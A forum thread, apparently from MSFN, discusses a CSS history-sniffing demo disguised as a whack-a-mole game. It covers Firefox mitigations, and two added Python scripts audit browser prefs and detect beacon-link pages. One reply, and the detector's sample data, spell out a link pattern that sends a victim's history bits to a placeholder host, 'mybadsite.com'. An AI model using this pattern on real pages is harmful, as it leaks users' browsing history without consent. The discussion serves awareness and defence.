Mathwiz

Clever hack can trick Web surfers into revealing their browsing history


This is a couple of years old, so apologies if it's already been discussed; but I just ran across this last night.

(BTW, this doesn't work in IE, or in Edge - yet - but works in Chrome, other Chromium derivatives like Opera, and FF and its derivatives.)

This demo appears at first to be a "whack-a-mole" game: you're supposed to click the "mole" as quickly as possible. But try it: when you click the "mole," it will pop up a list of these nine Web pages:

https://www.cnn.com
https://news.ycombinator.com
https://www.reddit.com
https://www.amazon.com
https://twitter.com/lcamtuf
https://www.donaldjtrump.com
https://www.farmersonly.com
https://www.diapers.com

... and will tell you which ones you've visited!

How it works: rather than being random, the mole's position depends on which combination of the above Web sites you've visited. Since there are nine Web sites, there are 2^9 or 512 possible visited/not visited combinations. So the demo actually shows 512 moles, one for each possible combination, and uses CSS "mix blend modes" to ensure only one mole is visible: the one that corresponds to your particular browsing history. Read the author's blog post for more details.

Note that although this demo uses Javascript to reveal the results, collecting the info only required HTML, CSS, and a means to convince you to click the right spot on the page, so add-ons like Noscript won't protect you. If this were a truly deceptive web page, you could imagine revealing whether you've visited any of hundreds of Web sites by playing the "game" (or by clicking apparently-innocuous links or buttons at the deceptive Web site) for a few minutes.

Countermeasures and Mitigations

There are a couple of obvious countermeasures, but you'd have to give up some functionality. You could just disable flagging visited links: in FF, toggle layout.css.visited_links_enabled in about:config to "false." In the demo, the mole will now always appear in the "no links visited" position.

Or you could give up mix blend mode instead: again in FF, toggle layout.css.mix-blend-mode.enabled to "false." This disables the "game": the "mole" is gone, replaced with a white rectangle; but I'd wager that 99% of legit Web sites wouldn't be significantly affected. (A few might display slightly "funny" but should work OK. Besides, they'd look that way under IE/Edge anyhow, unless they have IE/Edge-specific coding, and in that case, an IE-like SSUAO is all you'd need to fix the site.)

Finally, there's a weakness in this method that makes it a bit less revealing than you might think. When I first tried it, I was surprised to learn that I hadn't visited any of the above Web sites, even though I know I at least visit amazon.com rather often. But it didn't show as "visited" because I use a bookmark to go to amazon.com, which actually goes to https://www.amazon.com/?.... Since the demo page couldn't guess the entire long string, my browser didn't show https://www.amazon.com by itself as "visited." So maybe the best mitigation is just to append a ? and some extra random garbage to all your bookmarks!
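The two Firefox about:config toggles and the bookmark trick described above can be checked and applied with a small script. The following is an added example, not code from the MSFN post or from the demo's author; it parses the `user_pref("name", value);` lines of a Firefox prefs.js / user.js file, reports whether the two prefs named above are set to false, emits a user.js fragment that sets them, and rewrites a bookmark URL so the stored address no longer matches the bare URL a sniffing page would probe. The `nocache` parameter name and the sample prefs content are constructed for the example.

```python
"""Audit Firefox prefs for the two history-sniffing mitigations and apply the
bookmark mitigation (added example, not part of the MSFN thread)."""
import re
import secrets
from urllib.parse import urlsplit, urlunsplit

# The two prefs named in the post; both default to true in Firefox, and the
# post's mitigation is to set either (or both) to false.
MITIGATION_PREFS = {
    "layout.css.visited_links_enabled": False,
    "layout.css.mix-blend-mode.enabled": False,
}

# Real prefs.js / user.js line format: user_pref("name", value);
_PREF_RE = re.compile(r'^\s*user_pref\("([^"]+)",\s*(.+?)\);\s*$')


def parse_prefs(text):
    """Return {name: value} from user_pref lines.
    true/false become bool, integers become int, quoted strings become str."""
    prefs = {}
    for line in text.splitlines():
        m = _PREF_RE.match(line)
        if not m:
            continue  # comments, blank lines, anything that is not a pref
        name, raw = m.group(1), m.group(2).strip()
        if raw in ("true", "false"):
            prefs[name] = raw == "true"
        elif raw.startswith('"') and raw.endswith('"'):
            prefs[name] = raw[1:-1]
        else:
            try:
                prefs[name] = int(raw)
            except ValueError:
                prefs[name] = raw
    return prefs


def audit(prefs):
    """Map each mitigation pref to 'mitigated' (explicitly false),
    'default (exposed)' (absent, so Firefox's default true applies) or
    'exposed' (explicitly true)."""
    result = {}
    for name, wanted in MITIGATION_PREFS.items():
        if name not in prefs:
            result[name] = "default (exposed)"
        elif prefs[name] == wanted:
            result[name] = "mitigated"
        else:
            result[name] = "exposed"
    return result


def user_js_fragment():
    """user.js lines that apply both mitigations."""
    return "\n".join(f'user_pref("{n}", {str(v).lower()});'
                     for n, v in MITIGATION_PREFS.items())


def decoy_bookmark(url, token=None):
    """Append a random query parameter (name 'nocache' is an assumption) so the
    history entry is e.g. https://www.amazon.com/?nocache=... rather than the
    bare URL a :visited probe tests. An existing query string is kept."""
    parts = urlsplit(url)
    token = token or secrets.token_urlsafe(12)
    extra = f"nocache={token}"
    query = f"{parts.query}&{extra}" if parts.query else extra
    return urlunsplit((parts.scheme, parts.netloc, parts.path or "/",
                       query, parts.fragment))


# Constructed sample prefs.js content (not from a real profile): only one of
# the two mitigations has been applied.
SAMPLE_PREFS = """// Mozilla User Preferences
user_pref("layout.css.visited_links_enabled", false);
user_pref("browser.startup.page", 3);
user_pref("general.useragent.override", "Mozilla/5.0 (Windows NT 6.1)");
"""

if __name__ == "__main__":
    for name, status in audit(parse_prefs(SAMPLE_PREFS)).items():
        print(f"{name}: {status}")
    print("user.js fragment:\n" + user_js_fragment())
    print("decoy bookmark:", decoy_bookmark("https://www.amazon.com"))
```

Run it against a copy of your profile's prefs.js (or user.js) instead of SAMPLE_PREFS to see which of the two toggles is still at its default; the decoy_bookmark helper is the scripted version of the "append a ? and some random garbage" idea, and keeps any query string the bookmark already had.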


The problem is that this demo displays data only locally, no request is sent back.

And if it were, I'd assume it could be blocked by a specific rule in uBlock, as it is already nicely recognized as an inline script.


The demo is designed just to show what's possible; it's not designed to actually steal your browsing history! So of course no request is sent back.

6 hours ago, Mathwiz said:

... although this demo uses Javascript to reveal the results, collecting the info only required HTML, CSS, and a means to convince you to click the right spot on the page, so add-ons like Noscript won't protect you.

IOW, the "moles" could've been 512 simple links, from ...

<a href="http://mybadsite.com?user=victim1&historyBits=000">...</a>
         ... through ...
<a href="http://mybadsite.com?user=victim1&historyBits=511">...</a>

... so when you click one, the server just collects your data and goes to the next page.

And the demo runs fine with all of uBO's filters enabled. There's really nothing for uBO to block; that's what makes it potentially dangerous.
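What a content filter could look for, given the link-based variant sketched in this post, is the shape of the page rather than a domain: hundreds of anchors to one host that differ only in the value of a single query parameter. The following is an added example, not code from the thread or from uBlock Origin; it parses a page's anchors with the standard-library HTML parser and flags any (host, path, parameter) combination with an unusually large number of distinct values. The sample HTML is constructed from the link pattern above, and the threshold of 64 is a heuristic chosen for the example.

```python
"""Flag the 'one link per history combination' beacon pattern (added example,
not part of the MSFN thread)."""
from collections import defaultdict
from html.parser import HTMLParser
from urllib.parse import parse_qsl, urlsplit


class _HrefCollector(HTMLParser):
    """Collect the href of every <a> start tag."""

    def __init__(self):
        super().__init__()
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            for name, value in attrs:
                if name == "href" and value:
                    self.hrefs.append(value)


def find_beacon_groups(html, min_links=64):
    """Group anchors by (host, path, set of query keys). Inside each group,
    count distinct values per query key and report keys that take at least
    min_links distinct values. Returns [(host, path, key, distinct_count)]."""
    collector = _HrefCollector()
    collector.feed(html)
    groups = defaultdict(lambda: defaultdict(set))
    for href in collector.hrefs:
        u = urlsplit(href)
        pairs = parse_qsl(u.query, keep_blank_values=True)
        group_key = (u.netloc.lower(), u.path or "/",
                     tuple(sorted(k for k, _ in pairs)))
        for k, v in pairs:
            groups[group_key][k].add(v)
    findings = []
    for (host, path, _), per_key in groups.items():
        for k, values in per_key.items():
            if len(values) >= min_links:
                findings.append((host, path, k, len(values)))
    return findings


def build_sample_page():
    """Constructed page: a few ordinary links plus the 512 beacon links from
    the post, one per possible visited/not-visited combination."""
    ordinary = [
        '<a href="https://www.cnn.com">news</a>',
        '<a href="https://news.ycombinator.com/item?id=1">hn</a>',
        '<a href="/about">about</a>',
    ]
    beacons = [
        f'<a href="http://mybadsite.com?user=victim1&historyBits={bits:03d}">'
        f'mole</a>' for bits in range(512)
    ]
    return "<html><body>" + "".join(ordinary + beacons) + "</body></html>"


if __name__ == "__main__":
    for host, path, key, count in find_beacon_groups(build_sample_page()):
        print(f"{host}{path}: parameter '{key}' takes {count} distinct values")
```

The `user` parameter is not flagged because every link carries the same value; only `historyBits`, which enumerates the 512 combinations, crosses the threshold. A real filter would tune min_links per site, since paginated listings also produce many links that differ in one parameter.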


Except for a specific domain and a specific GET request to that domain? :P

uBO blocks nothing, because why should it block a test site?


Well, at the end of the day, all I can do is let folks know a potential security exposure exists. I can't make anyone understand it, or take it seriously.... :dubbio:


Sure, no harm's done :)

The only problem I see is that in the spying advertising industry, changes are quick. If this technique had great potential, it would already have been used by tech companies to track users, and if that were true, tracker-blockers would already have prepared an update :)

After all, worth knowing, but no reason to panic.
